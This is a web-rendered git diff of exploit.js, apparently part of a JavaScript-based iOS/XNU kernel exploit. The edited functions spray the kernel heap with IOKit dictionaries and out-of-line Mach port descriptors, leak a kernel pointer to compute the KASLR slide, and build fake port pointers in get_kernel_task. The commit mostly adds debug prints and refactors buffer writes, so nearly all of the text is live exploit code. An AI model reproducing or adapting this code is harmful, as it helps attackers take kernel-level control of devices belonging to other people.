summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js79
1 files changed, 39 insertions, 40 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 22f68ca..544a876 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -85,10 +85,11 @@ function spray_data(mem, size, num, portptr) {
printf("%x %x\n", master, read_u32(master));
printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide()));
ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr);
- printf("still alive?\n");
+ printf("still alive? %x %x\n", err, read_u32(err));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
+ printf("still alive? %x %x\n", err, read_u32(err));
return ret;
}
@@ -106,6 +107,7 @@ function copyinPort(kport, cnt) {
fakeportData = malloc(4);
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
+ printf("sprayed, still here\n");
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
printf("sprayed, still here\n");
@@ -129,17 +131,21 @@ function copyinPort(kport, cnt) {
IORegistryEntryGetChildIterator(service, "IOService", it);
var found = false;
+ var o = IOIteratorNext(read_u32(it));
+ printf("%x\n", o);
- while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) {
+ while (o != MACH_PORT_NULL && !found) {
var buf = malloc(16 * 4);
var size = malloc(4);
write_u32(size, 16 * 4);
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
+ printf("%d %s\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
printf("yolo\n");
// mach_port_deallocate(self, read_u32(data));
// write_u32(data, MACH_PORT_NULL);
spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ printf("still still alive?\n");
kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
@@ -147,6 +153,7 @@ function copyinPort(kport, cnt) {
return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
}
}
+ printf("didn't find it\n");
}
function prepare_ptr(dict, size, ptr, num) {
@@ -183,7 +190,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
-// printf("spray_ports %d\n", number_port_descs);
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -211,10 +218,11 @@ function fast_log2(n) {
}
function fast_array_mul(arr, n) {
+ var up_to = fast_log2(n) + 1;
var tmp_arr = arr;
var done = 0;
- for (var i = 0; i < fast_log2(n) + 2; i++) {
- tmp_arr = tmp_arr.concat(tmp_arr);
+ for (var i = 0; i < up_to; i++) {
+ tmp_arr.push.apply(tmp_arr);
done = (1 << i);
}
@@ -232,27 +240,33 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
- var new_buf_ = new Array();
- var tmp = u32_to_u8x4(init_port_set);
- new_buf_.push(tmp[0]);
- new_buf_.push(tmp[1]);
- new_buf_.push(tmp[2]);
- new_buf_.push(tmp[3]);
- tmp = u32_to_u8x4(num);
- new_buf_.push(tmp[0]);
- new_buf_.push(tmp[1]);
- new_buf_.push(tmp[2]);
- new_buf_.push(tmp[3]);
- new_buf_.push(0);
- new_buf_.push(0);
- new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
- new_buf_.push(19);
+ var new_buf = new Uint32Array(3);
+// var tmp = u32_to_u8x4(init_port_set);
+ new_buf[0] = (init_port_set);
+ new_buf[1] = (num);
+ new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16));
+
+// new_buf_.push(tmp[0]);
+// new_buf_.push(tmp[1]);
+// new_buf_.push(tmp[2]);
+// new_buf_.push(tmp[3]);
+// tmp = u32_to_u8x4(num);
+// new_buf_.push(tmp[0]);
+// new_buf_.push(tmp[1]);
+// new_buf_.push(tmp[2]);
+// new_buf_.push(tmp[3]);
+// new_buf_.push(0);
+// new_buf_.push(0);
+// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+// new_buf_.push(19);
// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
- var new_buf = fast_array_mul(new_buf_, number_port_descs);
+// var new_buf = fast_array_mul(new_buf_, number_port_descs);
- fast_write_buf(buf + req_init_port_set, new_buf);
+ for (var i = 0; i < number_port_descs; i++) {
+ write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4);
+ }
/*
for (var i = 0; i < number_port_descs; i++) {
@@ -286,7 +300,7 @@ function release_port_ptrs(port) {
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
printf("alive\n");
// if (ret != KERN_SUCCESS) {
- printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+// printf("mach_recv %d %s\n", ret, mach_error_string(ret));
printf("alive\n");
// }
free(req);
@@ -339,34 +353,19 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
- sched_yield();
+ var dummy = malloc(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
- sched_yield();
+ var dummy = malloc(4);
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
- var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
- sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
- printf("test\n");
- printf("test1\n");
- printf("test2\n");
- printf("test3\n");
- printf("test4\n");
- printf("test5\n");
- printf("test6\n");
- printf("test7\n");
- printf("test8\n");
- printf("test9\n");
- printf("test10\n");
release_port_ptrs(read_u32(fp + (i << 2)));
- printf("test11\n");
}
printf("get lucky\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 22:56:55 +0000